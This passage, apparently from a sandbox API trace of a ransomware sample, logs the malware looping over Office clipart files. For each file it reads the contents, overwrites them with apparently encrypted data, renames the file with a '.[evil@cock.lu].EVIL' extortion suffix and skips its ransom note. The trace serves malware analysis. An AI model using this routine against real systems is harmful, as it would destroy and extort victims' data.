??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.300] _errno () returned 0x84b1160840 [0113.300] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.300] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e22040*, nNumberOfBytesToWrite=0x1f40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e22040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1f40, lpOverlapped=0x0) returned 1 [0113.300] CloseHandle (hObject=0x1a8) returned 1 [0113.300] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.301] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.301] __uncaught_exception () returned 0x84b1160800 [0113.301] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.301] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00092_.wmf.[evil@cock.lu].evil")) returned 1 [0113.302] ??_V@YAXPEAX@Z () returned 0x1 [0113.305] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00092_.WMF", dwFileAttributes=0x200) returned 0 [0113.305] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.305] wcsstr (_Str="BS00100_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.305] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 69 [0113.305] wcscmp (_String1="BS00100_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.305] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00100_.WMF") returned 0x0 [0113.305] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF") returned 0x45 [0113.305] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.306] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x94a, lpOverlapped=0x0) returned 1 [0113.788] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.788] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.788] _errno () returned 0x84b1160840 [0113.788] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.788] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x960, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x960, lpOverlapped=0x0) returned 1 [0113.789] CloseHandle (hObject=0x1a8) returned 1 [0113.789] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.789] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.789] __uncaught_exception () returned 0x84b1160800 [0113.789] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.789] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00100_.wmf.[evil@cock.lu].evil")) returned 1 [0113.790] ??_V@YAXPEAX@Z () returned 0x1 [0113.793] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00100_.WMF", dwFileAttributes=0x200) returned 0 [0113.793] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.793] wcsstr (_Str="BS00135_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.793] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 69 [0113.793] wcscmp (_String1="BS00135_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.793] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00135_.WMF") returned 0x0 [0113.793] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF") returned 0x45 [0113.793] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.794] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x414, lpOverlapped=0x0) returned 1 [0113.819] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.819] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.819] _errno () returned 0x84b1160840 [0113.819] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.819] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x420, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x420, lpOverlapped=0x0) returned 1 [0113.819] CloseHandle (hObject=0x1a8) returned 1 [0113.819] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.819] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.819] __uncaught_exception () returned 0x84b1160800 [0113.819] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.820] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00135_.wmf.[evil@cock.lu].evil")) returned 1 [0113.820] ??_V@YAXPEAX@Z () returned 0x1 [0113.823] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00135_.WMF", dwFileAttributes=0x200) returned 0 [0113.823] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.823] wcsstr (_Str="BS00136_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.823] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 69 [0113.823] wcscmp (_String1="BS00136_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.823] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00136_.WMF") returned 0x0 [0113.823] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF") returned 0x45 [0113.823] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.825] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x876, lpOverlapped=0x0) returned 1 [0113.834] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.834] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.834] _errno () returned 0x84b1160840 [0113.834] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.834] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e25040*, nNumberOfBytesToWrite=0x880, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e25040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x880, lpOverlapped=0x0) returned 1 [0113.834] CloseHandle (hObject=0x1a8) returned 1 [0113.834] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.835] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.835] __uncaught_exception () returned 0x84b1160800 [0113.835] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.835] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00136_.wmf.[evil@cock.lu].evil")) returned 1 [0113.836] ??_V@YAXPEAX@Z () returned 0x1 [0113.838] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00136_.WMF", dwFileAttributes=0x200) returned 0 [0113.838] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.838] wcsstr (_Str="BS00145_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.838] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 69 [0113.838] wcscmp (_String1="BS00145_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.838] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00145_.WMF") returned 0x0 [0113.838] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF") returned 0x45 [0113.838] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.840] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x6b0, lpOverlapped=0x0) returned 1 [0113.853] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.853] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.853] _errno () returned 0x84b1160840 [0113.853] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.853] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x6c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x6c0, lpOverlapped=0x0) returned 1 [0113.853] CloseHandle (hObject=0x1a8) returned 1 [0113.853] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.854] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.854] __uncaught_exception () returned 0x84b1160800 [0113.854] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.854] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00145_.wmf.[evil@cock.lu].evil")) returned 1 [0113.854] ??_V@YAXPEAX@Z () returned 0x1 [0113.857] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00145_.WMF", dwFileAttributes=0x200) returned 0 [0113.857] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.857] wcsstr (_Str="BS00174_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.857] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 69 [0113.857] wcscmp (_String1="BS00174_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.857] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00174_.WMF") returned 0x0 [0113.857] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF") returned 0x45 [0113.857] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.859] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x20ae, lpOverlapped=0x0) returned 1 [0113.877] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.877] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.877] _errno () returned 0x84b1160840 [0113.877] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.877] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0x20c0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x20c0, lpOverlapped=0x0) returned 1 [0113.877] CloseHandle (hObject=0x1a8) returned 1 [0113.877] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.877] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.877] __uncaught_exception () returned 0x84b1160800 [0113.877] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.878] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00174_.wmf.[evil@cock.lu].evil")) returned 1 [0113.878] ??_V@YAXPEAX@Z () returned 0x1 [0113.881] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00174_.WMF", dwFileAttributes=0x200) returned 0 [0113.881] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.881] wcsstr (_Str="BS00184_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.881] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 69 [0113.881] wcscmp (_String1="BS00184_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.881] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00184_.WMF") returned 0x0 [0113.881] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF") returned 0x45 [0113.881] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.883] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1370, lpOverlapped=0x0) returned 1 [0113.885] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.885] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.885] _errno () returned 0x84b1160840 [0113.885] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.885] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1380, lpOverlapped=0x0) returned 1 [0113.885] CloseHandle (hObject=0x1a8) returned 1 [0113.885] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.885] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.885] __uncaught_exception () returned 0x84b1160800 [0113.885] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.886] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00184_.wmf.[evil@cock.lu].evil")) returned 1 [0113.886] ??_V@YAXPEAX@Z () returned 0x1 [0113.889] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00184_.WMF", dwFileAttributes=0x200) returned 0 [0113.889] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.889] wcsstr (_Str="BS00186_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.889] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 69 [0113.889] wcscmp (_String1="BS00186_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.889] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00186_.WMF") returned 0x0 [0113.889] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF") returned 0x45 [0113.889] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.891] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b303f040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x31f4, lpOverlapped=0x0) returned 1 [0113.920] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.920] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.920] _errno () returned 0x84b1160840 [0113.920] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.920] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b303f040*, nNumberOfBytesToWrite=0x3200, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b303f040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3200, lpOverlapped=0x0) returned 1 [0113.920] CloseHandle (hObject=0x1a8) returned 1 [0113.920] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0113.920] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0113.920] __uncaught_exception () returned 0x84b1160800 [0113.921] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0113.921] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00186_.wmf.[evil@cock.lu].evil")) returned 1 [0113.921] ??_V@YAXPEAX@Z () returned 0x1 [0113.924] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00186_.WMF", dwFileAttributes=0x200) returned 0 [0113.924] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0113.924] wcsstr (_Str="BS00200_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0113.924] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 69 [0113.924] wcscmp (_String1="BS00200_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0113.924] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS00200_.WMF") returned 0x0 [0113.924] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF") returned 0x45 [0113.924] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS00200_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs00200_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0113.926] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e21040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xc20, lpOverlapped=0x0) returned 1 [0113.944] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.944] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0113.944] _errno () returned 0x84b1160840 [0113.944] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.945] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e21040*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: 